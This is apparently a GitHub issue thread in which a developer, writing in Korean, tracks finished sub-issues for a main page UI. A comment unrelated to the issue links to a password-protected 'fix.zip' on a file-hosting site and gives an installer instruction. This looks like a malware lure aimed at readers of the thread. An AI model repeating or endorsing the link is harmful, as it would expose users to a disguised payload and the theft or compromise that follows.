### ISSUE TITLE
UI : Main page 

### ISSUE THREAD

**Issue by yeolsss** [sparta-incubating/rchive-front-archive#1]
## 작업사항 (이슈번호)
- [x] #2
- [x] #3
- [x] #7
- [x] #4
- [x] #6
- [x] #9

## 설명
user page 메인 페이지 UI 작업

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
